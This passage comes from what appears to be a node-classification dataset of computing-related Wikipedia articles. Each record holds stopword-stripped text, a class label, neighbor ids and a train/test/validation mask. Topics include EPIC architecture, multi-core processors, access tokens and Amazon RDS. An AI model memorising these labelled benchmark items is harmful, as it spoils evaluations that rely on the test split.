    "text": "Explicitly_parallel_instruction_computing:explicitly parallel instruction computing explicitly parallel instruction computing epic term coined 1997 hp–intel alliance describe computing paradigm researchers investigating since early 1980s paradigm also called independence architectures basis intel hp development intel itanium architecture hp later asserted epic merely old term itanium architecture epic permits microprocessors execute software instructions parallel using compiler rather complex on-die circuitry control parallel instruction execution intended allow simple performance scaling without resorting higher clock frequencies 1989 researchers hp recognized reduced instruction set computer risc architectures reaching limit one instruction per cycle began investigation new architecture later named epic basis research vliw multiple operations encoded every instruction processed multiple execution units one goal epic move complexity instruction scheduling cpu hardware software compiler instruction scheduling statically help trace feedback information eliminates need complex scheduling circuitry cpu frees space power functions including additional execution resources equally important goal exploit instruction level parallelism ilp using compiler find exploit additional opportunities parallel execution vliw least original forms several short-comings precluded becoming mainstream epic architecture evolved vliw architecture retained many concepts superscalar architecture epic architectures add several features get around deficiencies vliw epic architecture also includes grab-bag architectural concepts increase ilp itanium architecture also added rotating register files tool useful software pipelining since avoids manually unroll rename registers investigations epic architectures directly tied development itanium architecture",
    "neighbors": [
      7173,
      9739,
      4108,
      9741,
      5649,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      7770,
      1119,
      1122,
      3175,
      4204,
      8815,
      8820,
      630,
      8822,
      4217,
      6268,
      3197,
      8325,
      7313,
      8851,
      6804,
      6815,
      8352,
      5793,
      6818,
      6821,
      1702,
      7852,
      9391,
      2224,
      2226,
      7858,
      4276,
      9911,
      8890,
      2237,
      4286,
      5309,
      2241,
      2243,
      6339,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      5871,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      5883,
      8700,
      1798,
      5384,
      1801,
      5386,
      6926,
      6415,
      1298,
      11539,
      4886,
      3352,
      2337,
      2339,
      6950,
      3886,
      10548,
      309,
      8501,
      5948,
      4928,
      8514,
      5444,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      5503,
      3457,
      3459,
      3973,
      9095,
      9611,
      398,
      3470,
      5518,
      5523,
      407,
      9111,
      409,
      1952,
      10658,
      9126,
      936,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      1998,
      5073,
      466,
      1499,
      1501,
      1502,
      7134,
      5090,
      995,
      7653,
      1000,
      7657,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 10670,
    "label": 9,
    "text": "Guido_van_Rossum:guido van rossum guido van rossum born 31 january 1956 dutch programmer best known author python programming language benevolent dictator life bdfl stepped position july 2018 currently member python steering council van rossum born raised netherlands received master degree mathematics computer science university amsterdam 1982 brother van rossum type designer programmer designed typeface used python powered logo guido lives belmont california wife kim knapp son according home page dutch naming conventions van name capitalized referred surname alone using first last name together working centrum wiskunde informatica cwi van rossum wrote contributed glob routine bsd unix 1986 helped develop abc programming language stated try mention abc influence 'm indebted everything learned project people worked also created grail early web browser written python engaged discussions html standard worked various research institutes including centrum wiskunde informatica cwi netherlands u.s. national institute standards technology nist corporation national research initiatives cnri 2000 2003 worked zope corporation 2003 van rossum left zope elemental security worked custom programming language organization 2005 december 2012 worked google spent half time developing python language january 2013 started working dropbox december 1989 van rossum looking hobby programming project would keep occupied week around christmas office closed decided write interpreter new scripting language thinking lately descendant abc would appeal unix/c hackers attributes choosing name python slightly irreverent mood big fan monty python flying circus explained python predecessor abc inspired setl noting abc co-developer lambert meertens spent year setl group nyu coming final abc design july 2018 van rossum announced would stepping position bdfl python programming language 1999 van rossum submitted funding proposal darpa called computer programming everybody defined goals python python grown become popular programming language 2018 third popular language github social coding website behind javascript java according programming language popularity survey consistently amongst top 10 mentioned languages job postings furthermore python consistently top 10 popular languages according tiobe programming community index google van rossum developed mondrian web-based code review system written python used within company named software dutch painter piet mondrian named another related software project gerrit rietveld dutch designer 2013 van rossum started working cloud file storage company dropbox",
    "neighbors": [
      4483,
      7684,
      3462,
      4623,
      9875,
      6947,
      5677,
      9151,
      5699,
      1611,
      716,
      595,
      11221,
      10584,
      11497,
      8554,
      8301,
      9714,
      5492,
      8057,
      2045,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 10671,
    "label": 4,
    "text": "Richard_Menta:richard menta richard menta american journalist publisher mp3 newswire known decade commentary followed evolution digital media intellectual property protection menta also information security professional 1990s menta worked various publishers including simon schuster american lawyer media built business models designed leverage offline content online world included early experimentation digital audio video oversaw eventually led found mp3 newswire 1999 menta steered mp3 newswire original content making place knowledgeable professionals share opinions",
    "neighbors": [
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 10672,
    "label": 9,
    "text": "Architecture_description_language:architecture description language architecture description languages adls used several disciplines system engineering software engineering enterprise modelling engineering system engineering community uses architecture description language language and/or conceptual model describe represent system architectures software engineering community uses architecture description language computer language create description software architecture case so-called technical architecture architecture must communicated software developers functional architecture communicated various stakeholders users adls developed acme developed cmu aadl standardized sae c2 developed uci sbc-adl developed national sun yat-sen university darwin developed imperial college london wright developed cmu iso/iec/ieee 42010 document systems software engineering—architecture description defines architecture description language form expression use architecture descriptions specifies minimum requirements adls enterprise modelling engineering community also developed architecture description languages catered enterprise level examples include archimate standard open group demo abacus developed university technology sydney languages necessarily refer software components etc however refer application architecture architecture communicated software engineers writing refers primarily perspective software engineering community standard notation adl representing architectures helps promote mutual communication embodiment early design decisions creation transferable abstraction system architectures past largely represented box-and-line drawing annotated things nature component properties semantics connections overall system behavior adls result linguistic approach formal representation architectures address shortcomings also important sophisticated adls allow early analysis feasibility testing architectural design decisions adls classified three broad categories box-and-line informal drawings formal architecture description language uml unified modeling language -based notations box-and-line long time predominant means describing sas providing useful documentation level informality limited usefulness architecture description rigorous way describing sas required quoting allen garlan 1997 box-and-line descriptions may provide useful documentation current level informality limits usefulness since generally imprecise meant architectural descriptions may impossible analyze architecture consistency determine non-trivial properties moreover way check system implementation faithful architectural design similar conclusion drawn perry wolf 1992 reports aside providing clear precise documentation primary purpose specifications provide automated analysis documents expose various kinds problems would otherwise go undetected since thread research formal languages sa description carried tens formal adls proposed characterized different conceptual architectural elements different syntax semantics focusing specific operational domain suitable different analysis techniques example domain-specific adls presented deal embedded real-time systems aadl east-adl eadl control-loop applications diaspec product line architectures koala dynamic systems π-adl analysis-specific adls proposed deal availability reliability security resource consumption data quality real-time performance analysis aadl behavioral analysis fractal trustworthiness analysis tadl however efforts seen desired adoption industrial practice reasons lack industry adoption analyzed woods hilliard pandey clements others formal adls rarely integrated software life-cycle seldom supported mature tools scarcely documented focusing specific needs leaving space extensions enabling addition new features way overcome limitations uml indicated possible successor existing adls many proposals presented use extend uml properly model software architectures fact highlighted recent study conducted practitioners whilst practitioners generally satisfied design capabilities provided languages use dissatisfied architectural language analysis features abilities define extra-functional properties architectural languages used practice mostly originate industrial development instead academic research formality better usability required architectural language large variety adls developed either academic industrial groups many languages intended adl turn suitable representing analyzing architecture principle adls differ requirements languages adls rooted solution space whereas requirements describe problem spaces differ programming languages adls bind architectural abstractions specific point solutions modeling languages represent behaviors adls focus representation components however domain specific modeling languages dsmls focus representation components minimal requirements language must adls common adls differ ability adl community generally agrees software architecture set components connections among different kind architectures like adls implement interface connection architecture architecture context software systems roughly divided categories primarily software architecture network architecture systems architecture within categories tangible fuzzy distinction architecture design draw distinction universally clearly possible best consider design noun rather verb comparison two nouns design abstraction specification patterns organs functionality implemented architecture degree higher abstraction granularity consequentially architecture also topological nature design specifies major components meet relate one another architecture focuses partitioning major regions functionality high level components physically virtually reside off-the-shelf components may employed effectively general interfaces component expose protocols employed practices high level patterns may best meet extensibility maintainability reliability durability scalability non-functional objectives design detailing choices concrete clarification functional requirements met delegation pieces functionality granular components smaller components organized within larger ones oftentimes portion architecture done conceptualization application system network may appear non-functional sections requirement documentation canonically design specified requirements rather driven process defining architecture may involve heuristics acquired architect architectural team experience within domain design architecture often evolves series iterations wisdom high level design often tested low level design implementation occurs wisdom architecture tested specification high level design cases wisdom specification called question detailing another iteration either architecture design case may may become necessary summary primary differences architecture design ones granularity abstraction consequentially chronology architecture generally precedes design although overlap circular iteration common reality list gives candidates best adl date up-to-date list currently existing architectural languages please refer up-to-date list adls approaches architecture",
    "neighbors": [
      9345,
      2374,
      987,
      8262,
      9926,
      4042,
      8975,
      6032,
      305,
      1459,
      6420,
      7444,
      9780,
      3159,
      7802,
      187
    ],
    "mask": "None"
  },
  {
    "node_id": 10673,
    "label": 2,
    "text": "Access_token:access token computer systems access token contains security credentials login session identifies user user groups user privileges cases particular application typically one may asked enter access token example 40 character long gibberish rather usual password therefore kept secret like password access token object encapsulating security identity process thread token used make security decisions store tamper-proof information system entity token generally used represent security information capable holding additional free-form data attached token created tokens duplicated without special privilege example create new token lower levels access rights restrict access launched application access token used windows process thread tries interact objects security descriptors securable objects windows access token represented system object type codice_1 access token generated logon service user logs system credentials provided user authenticated authentication database authentication database contains credential information required construct initial token logon session including user id primary group id groups part information token attached initial process created user session inherited subsequent processes created initial process whenever process opens handle resource access control enabled windows reconciles data target object security descriptor contents current effective access token result access check evaluation indication whether access allowed operations read write/modify etc calling application allowed perform two types tokens available token composed various fields including",
    "neighbors": [
      5643,
      1551,
      4624,
      537,
      540,
      3102,
      9762,
      2083,
      8227,
      8740,
      10281,
      7729,
      2101,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      9813,
      10839,
      603,
      9819,
      93,
      6750,
      3170,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8841,
      3723,
      2193,
      9874,
      10900,
      4248,
      8344,
      9377,
      3235,
      4771,
      6820,
      1703,
      2737,
      5300,
      2749,
      200,
      9420,
      2782,
      9441,
      9442,
      4836,
      4326,
      2279,
      3308,
      10993,
      3834,
      9466,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      10024,
      3881,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      5435,
      6972,
      3394,
      4423,
      3922,
      4439,
      5465,
      2402,
      4458,
      6506,
      4972,
      9593,
      2943,
      1418,
      5003,
      5004,
      1945,
      11677,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      6098,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      2027,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 10674,
    "label": 2,
    "text": "List_of_Sony_Ericsson_products:list sony ericsson products following list products manufactured sony ericsson brand models released multiple names depending region release currently usually indicated letter added end model number international north america c mainland china indicated mostly older models slightly differing model number typically one version european us market another asian market however models yet versions walkman branded models also released non-walkman version sony ericsson w580 s500 versions usually differ slightly phones boldface indicates phone smartphone status p indicates production discontinued u indicates upcoming sony ericsson c902 released second quarter 2008 java based feature device running sony ericsson proprietary a200 platform special feature presence 8 touch sensitive keys using capacitive technology camera mode camera technology includes face detection music player similar system used company walkman series handsets phone first sony ericsson new 'cyber-shot c-series phones designed successor popular k800i k850 c902 featured james bond film quantum solace praised user interface design build quality although device received favourable reviews analysts expect reach level popularity sales predecessor k800i intended flagship model sony ericsson g700 announced mobile world congress formerly 3gsm congress february 2008 based symbian os 9.1 uiq 3.0 platform handset average reviews lot reviewers criticizing phone priced high better equipped g900 price bracket others lamented fact sony ericsson chose implement technology presented late 2006 p1 business edition also exists sony ericsson g700 camera announced 2008 mobile world congress formerly 3gsm congress february year g900 mid-to-high-end smartphone based symbian 9.1 uiq 3.0 platform phone sports high quality sound 3g wi-fi clear 5.0-megapixel camera phones cyber-shot branding first entertainment unlimited phones announced launched 2009 creating new category benefits audio images combined smart good-looking high-performing devices apart first-rate audio-visual strength products common differentiating factors user interface borrowing wider sony group ui-developments aino first product connects world sony playstation remotely via remote media play vivaz first sony ericsson phone supporting high definition hd video capture note lists intended inclusive information may missing date note lists incomplete information may missing sun visor handsfree bluetooth hch- xx phone holder following speaker drain power fastport batteries wall socked needed newer products without fastport fastport models trrs 4-pole 3.5 mm jack omtp models",
    "neighbors": [
      1121,
      11271,
      1833,
      10674,
      1083,
      8285
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10675,
    "label": 3,
    "text": "Multi-core_processor:multi-core processor multi-core processor computer processor integrated circuit two separate processing units called cores reads executes program instructions computer several processors instructions ordinary cpu instructions add move data branch single processor run instructions separate cores time increasing overall speed programs support multithreading parallel computing techniques manufacturers typically integrate cores onto single integrated circuit die known chip multiprocessor cmp onto multiple dies single chip package microprocessors currently used almost personal computers multi-core multi-core processor implements multiprocessing single physical package designers may couple cores multi-core device tightly loosely example cores may may share caches may implement message passing shared-memory inter-core communication methods common network topologies interconnect cores include bus ring two-dimensional mesh crossbar homogeneous multi-core systems include identical cores heterogeneous multi-core systems cores identical e.g big.little heterogeneous cores share instruction set amd accelerated processing units cores n't even share instruction set single-processor systems cores multi-core systems may implement architectures vliw superscalar vector multithreading multi-core processors widely used across many application domains including general-purpose embedded network digital signal processing dsp graphics gpu improvement performance gained use multi-core processor depends much software algorithms used implementation particular possible gains limited fraction software run parallel simultaneously multiple cores effect described amdahl law best case so-called embarrassingly parallel problems may realize speedup factors near number cores even problem split enough fit within core cache avoiding use much slower main-system memory applications however accelerated much unless programmers invest prohibitive amount effort re-factoring whole problem parallelization software significant ongoing topic research terms multi-core dual-core commonly refer sort central processing unit cpu sometimes also applied digital signal processors dsp system chip soc terms generally used refer multi-core microprocessors manufactured integrated circuit die separate microprocessor dies package generally referred another name multi-chip module article uses terms multi-core dual-core cpus manufactured integrated circuit unless otherwise noted contrast multi-core systems term multi-cpu refers multiple physically separate processing-units often contain special circuitry facilitate communication terms many-core massively multi-core sometimes used describe multi-core architectures especially high number cores tens thousands systems use many soft microprocessor cores placed single fpga core considered semiconductor intellectual property core well cpu core manufacturing technology improves reducing size individual gates physical limits semiconductor-based microelectronics become major design concern physical limitations cause significant heat dissipation data synchronization problems various methods used improve cpu performance instruction-level parallelism ilp methods superscalar pipelining suitable many applications inefficient others contain difficult-to-predict code many applications better suited thread-level parallelism tlp methods multiple independent cpus commonly used increase system overall tlp combination increased available space due refined manufacturing processes demand increased tlp led development multi-core cpus several business motives drive development multi-core architectures decades possible improve performance cpu shrinking area integrated circuit ic reduced cost per device ic alternatively circuit area transistors could used design increased functionality especially complex instruction set computing cisc architectures clock rates also increased orders magnitude decades late 20th century several megahertz 1980s several gigahertz early 2000s rate clock speed improvements slowed increased use parallel computing form multi-core processors pursued improve overall processing performance multiple cores used cpu chip could lead better sales cpu chips two cores example intel produced 48-core processor research cloud computing core x86 architecture since computer manufacturers long implemented symmetric multiprocessing smp designs using discrete cpus issues regarding implementing multi-core processor architecture supporting software well known additionally order continue delivering regular performance improvements general-purpose processors manufacturers intel amd turned multi-core designs sacrificing lower manufacturing-costs higher performance applications systems multi-core architectures developed alternatives especially strong contender established markets integration peripheral functions chip proximity multiple cpu cores die allows cache coherency circuitry operate much higher clock rate possible signals travel off-chip combining equivalent cpus single die significantly improves performance cache snoop alternative bus snooping operations put simply means signals different cpus travel shorter distances therefore signals degrade less higher-quality signals allow data sent given time period since individual signals shorter need repeated often assuming die physically fit package multi-core cpu designs require much less printed circuit board pcb space multi-chip smp designs also dual-core processor uses slightly less power two coupled single-core processors principally decreased power required drive signals external chip furthermore cores share circuitry like l2 cache interface front-side bus fsb terms competing technologies available silicon die area multi-core design make use proven cpu core library designs produce product lower risk design error devising new wider-core design also adding cache suffers diminishing returns multi-core chips also allow higher performance lower energy big factor mobile devices operate batteries since core multi-core cpu generally energy-efficient chip becomes efficient single large monolithic core allows higher performance less energy challenge however additional overhead writing parallel code maximizing usage computing resources provided multi-core processors requires adjustments operating system os support existing application software also ability multi-core processors increase application performance depends use multiple threads within applications integration multi-core chip lower chip production yields also difficult manage thermally lower-density single-core designs intel partially countered first problem creating quad-core designs combining two dual-core ones single die unified cache hence two working dual-core dies used opposed producing four cores single die requiring four work produce quad-core cpu architectural point view ultimately single cpu designs may make better use silicon surface area multiprocessing cores development commitment architecture may carry risk obsolescence finally raw processing power constraint system performance two processing cores sharing system bus memory bandwidth limits real-world performance advantage 2009 report dr jun ni showed single core close memory-bandwidth limited going dual-core might give 30 70 improvement memory bandwidth problem 90 improvement expected however amdahl law makes claim dubious would possible application used two cpus end running faster single-core one communication cpus limiting factor would count 100 improvement trend processor development towards ever-increasing number cores processors hundreds even thousands cores become theoretically possible addition multi-core chips mixed simultaneous multithreading memory-on-chip special-purpose heterogeneous asymmetric cores promise performance efficiency gains especially processing multimedia recognition networking applications example big.little core includes high-performance core called 'big low-power core called 'little also trend towards improving energy-efficiency focusing performance-per-watt advanced fine-grain ultra fine-grain power management dynamic voltage frequency scaling i.e laptop computers portable media players chips designed outset large number cores rather evolved single core designs sometimes referred manycore designs emphasising qualitative differences composition balance cores multi-core architecture show great variety architectures use one core design repeated consistently homogeneous others use mixture different cores optimized different heterogeneous role article cpu designers debate multi-core future rick merritt ee times 2008 includes comments outdated version anti-virus application may create new thread scan process gui thread waits commands user e.g cancel scan cases multi-core architecture little benefit application due single thread heavy lifting inability balance work evenly across multiple cores programming truly multithreaded code often requires complex co-ordination threads easily introduce subtle difficult-to-find bugs due interweaving processing data shared threads see thread-safety consequently code much difficult debug single-threaded code breaks perceived lack motivation writing consumer-level threaded applications relative rarity consumer-level demand maximum use computer hardware although threaded applications incur little additional performance penalty single-processor machines extra overhead development difficult justify due preponderance single-processor machines also serial tasks like decoding entropy encoding algorithms used video codecs impossible parallelize result generated used help create next result entropy decoding algorithm given increasing emphasis multi-core chip design stemming grave thermal power consumption problems posed significant increase processor clock speeds extent software multithreaded take advantage new chips likely single greatest constraint computer performance future developers unable design software fully exploit resources provided multiple cores ultimately reach insurmountable performance ceiling telecommunications market one first needed new design parallel datapath packet processing quick adoption multiple-core processors datapath control plane mpus going replace traditional network processors based proprietary microcode picocode parallel programming techniques benefit multiple cores directly existing parallel programming models cilk plus openmp openhmpp fastflow skandium mpi erlang used multi-core platforms intel introduced new abstraction c++ parallelism called tbb research efforts include codeplay sieve system cray chapel sun fortress ibm x10 multi-core processing also affected ability modern computational software development developers programming newer languages might find modern languages support multi-core functionality requires use numerical libraries access code written languages like c fortran perform math computations faster newer languages like c intel mkl amd acml written native languages take advantage multi-core processing balancing application workload across processors problematic especially different performance characteristics different conceptual models deal problem example using coordination language program building blocks programming libraries higher-order functions block different native implementation processor type users simply program using abstractions intelligent compiler chooses best implementation based context managing concurrency acquires central role developing parallel applications basic steps designing parallel applications hand server side multi-core processors ideal allow many users connect site simultaneously independent threads execution allows web servers application servers much better throughput vendors may license software per processor give rise ambiguity processor may consist either single core combination cores embedded computing operates area processor technology distinct mainstream pcs technological drives towards multi-core apply indeed many cases application natural fit multi-core technologies task easily partitioned different processors addition embedded software typically developed specific hardware release making issues software portability legacy code supporting independent developers less critical case pc enterprise computing result easier developers adopt new technologies result greater variety multi-core processing architectures suppliers multi-core network processors become mainstream companies freescale semiconductor cavium networks wintegra broadcom manufacturing products eight processors system developer key challenge exploit cores devices achieve maximum networking performance system level despite performance limitations inherent symmetric multiprocessing smp operating system companies 6wind provide portable packet processing software designed networking data plane runs fast path environment outside operating system network device digital signal processing trend applies texas instruments three-core tms320c6488 four-core tms320c5441 freescale four-core msc8144 six-core msc8156 stated working eight-core successors newer entries include storm-1 family stream processors inc 40 80 general purpose alus per chip programmable c simd engine picochip three-hundred processors single die focused communication applications heterogeneous computing system uses one kind processor cores multi-core solutions becoming common xilinx zynq ultrascale+ mpsoc quad-core arm cortex-a53 dual-core arm cortex-r5 software solutions openamp used help inter processor communication mobile devices may use arm big.little architecture research development multicore processors often compares many options benchmarks developed help evaluations existing benchmarks include splash-2 parsec cosmic heterogeneous systems",
    "neighbors": [
      3586,
      9732,
      7173,
      9224,
      9739,
      4108,
      4622,
      5649,
      2066,
      7697,
      7699,
      5655,
      10779,
      10781,
      6181,
      10277,
      8231,
      6184,
      10789,
      4139,
      8237,
      3630,
      9774,
      5681,
      6705,
      7218,
      9782,
      4664,
      4669,
      2623,
      2113,
      7234,
      7745,
      3142,
      2635,
      4173,
      2638,
      9302,
      10838,
      2140,
      3677,
      5725,
      1119,
      1122,
      99,
      4194,
      10853,
      3175,
      8810,
      4204,
      7788,
      8815,
      6768,
      3185,
      8820,
      630,
      8822,
      4217,
      7802,
      9851,
      6268,
      3197,
      4223,
      6783,
      7820,
      2193,
      146,
      659,
      4241,
      6804,
      7313,
      9368,
      7833,
      666,
      1181,
      6815,
      8352,
      5793,
      6818,
      8863,
      6821,
      5798,
      6311,
      1707,
      2731,
      7852,
      9391,
      2224,
      2226,
      7858,
      1207,
      9911,
      9913,
      8890,
      2237,
      4286,
      5309,
      2241,
      2243,
      4803,
      6339,
      4811,
      2764,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      2269,
      11487,
      7911,
      8937,
      10985,
      1260,
      1772,
      5358,
      5871,
      1776,
      8944,
      9964,
      757,
      2805,
      3317,
      6391,
      249,
      10485,
      3323,
      5883,
      8700,
      10493,
      8447,
      5892,
      1798,
      3846,
      5384,
      1801,
      11530,
      6926,
      6415,
      4880,
      785,
      1298,
      8977,
      11539,
      4886,
      7446,
      3352,
      11030,
      7963,
      1309,
      8992,
      2339,
      10021,
      6950,
      2345,
      810,
      4909,
      3886,
      4399,
      7983,
      10543,
      309,
      3894,
      8501,
      4920,
      1849,
      5948,
      8508,
      9020,
      9022,
      4928,
      6464,
      1346,
      8514,
      5444,
      5956,
      4423,
      1866,
      8523,
      5452,
      6476,
      2895,
      7505,
      2388,
      9044,
      342,
      11604,
      344,
      2394,
      11613,
      6495,
      1376,
      8543,
      10085,
      10603,
      8044,
      11629,
      9070,
      4465,
      10612,
      1399,
      3960,
      7033,
      1402,
      10620,
      3457,
      9090,
      2435,
      9092,
      3973,
      9095,
      6539,
      9611,
      398,
      3470,
      3472,
      5518,
      5523,
      6549,
      11580,
      407,
      9111,
      409,
      4505,
      1435,
      3483,
      4508,
      7581,
      10139,
      10658,
      2979,
      5029,
      5541,
      9126,
      11688,
      4525,
      8109,
      1967,
      2480,
      4017,
      10669,
      1461,
      1462,
      1463,
      6072,
      7607,
      5051,
      446,
      4030,
      7614,
      1985,
      9665,
      9155,
      10180,
      453,
      3014,
      7111,
      456,
      1480,
      1998,
      3537,
      466,
      5073,
      9172,
      10199,
      2523,
      1499,
      6107,
      1502,
      1503,
      7134,
      5090,
      995,
      7653,
      7142,
      1000,
      7657,
      9707,
      8684,
      10734,
      5103,
      6639,
      11248,
      499,
      4596,
      2039,
      10746,
      508,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10676,
    "label": 2,
    "text": "Myarc_Disk_Operating_System:myarc disk operating system mdos short myarc disk operating system operating system commercialized myarc designed implemented specifically geneve 9640 paul charlton mdos designed fully emulate ti-99/4a computer providing advanced time virtual memory operating environment full support mouse gui complex mathematical applications mdos written specifically tms9995 16-bit cpu yamaha v9938 video display processor",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      11462,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      5359,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 10677,
    "label": 4,
    "text": "Ticket_(IT_security):ticket security security ticket number generated network server client delivered different server means authentication proof authorization easily forged usage word originated mit kerberos protocol 1980s tickets may either transparent meaning recognized without contacting server generated opaque meaning original server must contacted verify issued ticket magic cookies provide functionality ticket",
    "neighbors": [
      7368,
      4490,
      6098,
      8760,
      5433,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10678,
    "label": 4,
    "text": "IBM_4765:ibm 4765 ibm 4765 pcie cryptographic coprocessor hardware security module hsm includes secure cryptoprocessor implemented high-security tamper resistant programmable pcie board specialized cryptographic electronics microprocessor memory random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed ibm 4765 validated fips pub 140-2 level 4 highest level certification achievable commercial cryptographic devices ibm 4765 data sheet describes coprocessor detail ibm supplies two cryptographic-system implementations toolkits custom application development also available applications may include financial pin transactions bank-to-clearing-house transactions emv transactions integrated circuit chip based credit cards general-purpose cryptographic applications using symmetric key algorithms hashing algorithms public key algorithms operational keys symmetric rsa private generated coprocessor saved either keystore file application memory encrypted master key coprocessor coprocessor identical master key use keys ibm supports 4765 ibm z ibm power systems ibm-approved x86 servers linux microsoft windows may 2011 ibm 4765 superseded ibm 4764 discontinued ibm 4765 discontinued platforms successor 4765 ibm 4767 introduced ibm server platforms links point various relevant cryptographic standards iso 13491 secure cryptographic devices https //www.iso.org/standard/61137.html iso 9564 pin security https //www.iso.org/standard/68669.html ansi x9.24 part 1 key management using symmetric techniques https //webstore.ansi.org/recorddetail.aspx sku=ansi+x9.24-1-2017 ansi x9.24 part 2 key management using asymmetric techniques https //webstore.ansi.org/recorddetail.aspx sku=ansi+x9.24-2-2016 fips 140-2 https //nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf",
    "neighbors": [
      6797,
      2382,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10679,
    "label": 3,
    "text": "Indiana_Jones_and_the_Last_Crusade:_The_Action_Game:indiana jones last crusade action game indiana jones last crusade action game published 1989 lucasfilm games based film name game released zx spectrum amstrad cpc commodore 64 atari st amiga ibm pc msx master system nes game boy sega genesis game gear different game also released 1989 also different game nintendo entertainment system titled indiana jones last crusade released taito 1991 movie player quest find holy grail en route player must find cross coronado knight first crusade shield indiana father grail diary computer gaming world gave game negative review said another search recover game little indiana jones review praised graphics sound found fight sequences easy short since enemies could defeated one hit turned backs shortly attacking player compute liked commodore 64 version approving graphics describing gameplay quite addicting criticizing lack savegame replay value zx spectrum sales charts reached number two behind robocop number one every month year nintendo power reviewing nes version praised action gameplay noted music levels helped recreate feel movie nintendo power impressed character graphics stated animation quite good nes nintendo power praised game boy version graphics password system challenging gameplay criticized poor hit detection time limits level made game difficult action game features six levels password feature game players rated nes version 52 percent",
    "neighbors": [
      5400,
      9166,
      973,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 10680,
    "label": 9,
    "text": "BLISS:bliss bliss system programming language developed carnegie mellon university w. a. wulf d. b. russell a. n. habermann around 1970 perhaps best known systems programming language right c made debut years later since c took bliss faded obscurity c infancy projects within bell labs debating merits bliss vs. c. bliss typeless block-structured language based expressions rather statements includes constructs exception handling coroutines macros include goto statement name variously said short basic language implementation system software system software implementation language backwards sometimes called bill language implementing system software bill wulf original carnegie mellon compiler notable extensive use optimizations formed basis classic book design optimizing compiler dec developed maintained bliss compilers pdp-10 pdp-11 vax dec prism mips dec alpha intel ia-32 language become popular among customers compiler dec used heavily in-house 1980s utility programs vms operating system written bliss-32 acquisition dec compaq developed maintained bliss compiler intel ia-64 bliss language following characteristics following example taken verbatim bliss language manual",
    "neighbors": [
      512,
      9345,
      2179,
      5380,
      4998,
      7561,
      8474,
      1952,
      7337,
      7983,
      2619,
      2620,
      7234,
      3142,
      8262,
      1611,
      11219,
      11604,
      7134,
      5855,
      4069,
      5612,
      8435,
      9331,
      757,
      4092,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 10681,
    "label": 1,
    "text": "Amazon_Relational_Database_Service:amazon relational database service amazon relational database service amazon rds distributed relational database service amazon web services aws web service running cloud designed simplify setup operation scaling relational database use applications administration processes like patching database software backing databases enabling point-in-time recovery managed automatically scaling storage compute resources performed single api call aws offer ssh connection rds instances amazon rds first released 22 october 2009 supporting mysql databases followed support oracle database june 2011 november 2014 aws announced amazon aurora mysql-compatible database offering enhanced high availability performance october 2017 postgresql-compatible database offering launched.. march 2019 aws announced support postgresql 11 rds five months official release new database instances launched aws management console using amazon rds apis amazon rds offers different features support different use cases major features may 2010 amazon announced multi-availability zone deployment support amazon rds multi-availability zone az allows users automatically provision maintain synchronous physical logical “ standby ” replica depending database engine different availability zone independent infrastructure physically separate location multi-az database instance developed creation time modified run multi-az deployment later multi-az deployments aim provide enhanced availability data durability mysql mariadb oracle postgresql sql server instances targeted production environments event planned database maintenance unplanned service disruption amazon rds automatically fails up-to-date standby allowing database operations resume without administrative intervention multi-az rds instances optional cost associated creating rds instance user asked would like use multi-az rds instance multi-az rds deployments backups done standby instance i/o activity suspended time may experience elevated latencies minutes backups read replicas allow different uses case scale read-heavy database workloads available five replicas mysql mariadb postgresql instances use native asynchronous replication functionality respective database engines backups configured default accessible used read scaling mysql mariadb read replicas made writeable since october 2012 postgresql read replicas support replicas done database server level support replication database instance table level performance metrics amazon rds available aws management console amazon cloudwatch api december 2015 amazon announced optional enhanced monitoring feature provides expanded set metrics mysql mariadb aurora database engines amazon rds instances priced similarly amazon elastic compute cloud ec2 rds charged per hour comes two packages on-demand db instances reserved db instances on-demand instances ongoing hourly usage rate reserved db instances require up-front one-time fee turn provide discount hourly usage charge instance apart hourly cost running rds instance users charged amount storage provisioned data transfers input output operations performed aws introduced provisioned input output operations user define many io per second required application iops contribute significantly total cost running rds instance part aws free tier amazon rds free tier helps new aws customers get started managed database service cloud free use amazon rds free tier develop new applications test 